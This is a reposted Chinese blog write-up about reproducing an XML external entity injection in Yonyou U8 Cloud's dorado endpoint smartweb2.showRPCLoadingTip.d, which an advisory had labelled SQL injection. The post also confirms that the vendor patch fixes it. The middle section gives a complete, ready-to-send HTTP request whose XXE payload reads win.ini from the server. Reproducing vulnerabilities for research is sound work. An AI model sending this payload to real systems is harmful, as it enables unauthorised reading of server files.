记一次通告引起的漏洞复现记录

admin 2024年9月10日22:49:20评论32 views字数 2448阅读8分9秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安设为星标”,否则可能看不到了

2024年4月@不会飞的鱼师傅投稿分享的一篇文章,记录的是他因一起用友的漏洞通告而找到对应的POC并对该漏洞进行复现测试的过程,文章版权归原作者所有。

0x00 前言

在一个风不平浪不静的下午,收到一个通告长这样yongyou-u8c-sqli-showRPCLoadingTip,一个用友U8的SQL注入,可是我找遍了浏览器都没找到这个漏洞,瞬间怀疑人生,在github搜索找到相关一段代码长这样。
<servlet-mapping>      <servlet-name>DoradoServlet</servlet-name>      <url-pattern>/dorado/smartweb2.showRPCLoadingTip.d</url-pattern></servlet-mapping>

是一个叫dorado的中间件,全称叫“dorado展现中间件”,既然找到了源码那就搭建看一看吧,可惜菜鸡一个并么有运行起来...。

https://github.com/LoveSnowBear/lovesnowbear.github.com/

没运行起来就没运行起来吧,那就用通告呢抓个包跑一下sqlmap,可惜sqlmap告诉我参数被污染(我并没有污染参数),突然头大了,难道要手动验证?

后续搜索U8的注入看见一个XML实体注入漏洞smartweb2.RPC.dXML外部实体注入,这不是和我的smartweb2.showRPCLoadingTip.d参数很像吗?瞬间想到有没有可能这并不是一个SQL注入,而是一个XML实体注入漏洞,后续证实这就是一个XML注入。

由于没有在公网找到相关记录,遂记录一下(在这我还惊喜一下,网络没记录那是不是可以申请一个证书,想多啦,打补丁后就修复了,可能影响v5以下呢吧)。

0x01 环境搭建

U8 cloud3.6
记一次通告引起的漏洞复现记录

0x02 漏洞验证(想法验证)

既然和smartweb2.RPC.d接口XML外部实体注入漏洞一个类型,那是否payload通用,证明是可行的,应该是U8引用了dorado5,NC也应该有类似漏洞,因为smartweb2.RPC.d_XML外部实体注入NC和U8cloud都存在。
POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?__rpc=true HTTP/1.1Host: 192.168.83.130:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 262Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
记一次通告引起的漏洞复现记录

在github中的源码像这样的接口有好几个,我都跑了一下都可以实现XML注入,不一一举例了。

https://github.com/LoveSnowBear/lovesnowbear.github.com/blob/77c78bb7b250dd35e7d139fef03356f474ca0630/daordo5with7/dorado5/web/WEB-INF/web.xml

这个应用也引用了dorado可惜年代久远:

https://github.com/bellmit/tmsvat/blob/6ecab97ca730cc070d89e2092b0b20012175774f/deloitte.tms.pl/deloitte.tms.pl.attachment.core/src/main/webapp/WEB-INF/web.xml#L154
记一次通告引起的漏洞复现记录
记一次通告引起的漏洞复现记录

在github中看web.xml只有daordo5写有这样的路由,daordo5-2和daordo7没有相似路由。

daordo5-web.xml
记一次通告引起的漏洞复现记录

dorado5-2-web.xml

记一次通告引起的漏洞复现记录

dorado7-web.xml

记一次通告引起的漏洞复现记录

0x03 遐想验证,打补丁后验证

从官网下载补丁更新后进行验证修复了(可惜了了呀,可惜);NC有没有修复没去验证了,累了。
https://security.yonyou.com/#/patchInfo?identifier=3c900fd6f90943afb43f699c8be59557
记一次通告引起的漏洞复现记录

更新补丁后验证

记一次通告引起的漏洞复现记录

*****人生如戏咯*****

原文始发于微信公众号(TtTeam):记一次通告引起的漏洞复现记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月10日22:49:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次通告引起的漏洞复现记录https://cn-sec.com/archives/3150790.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息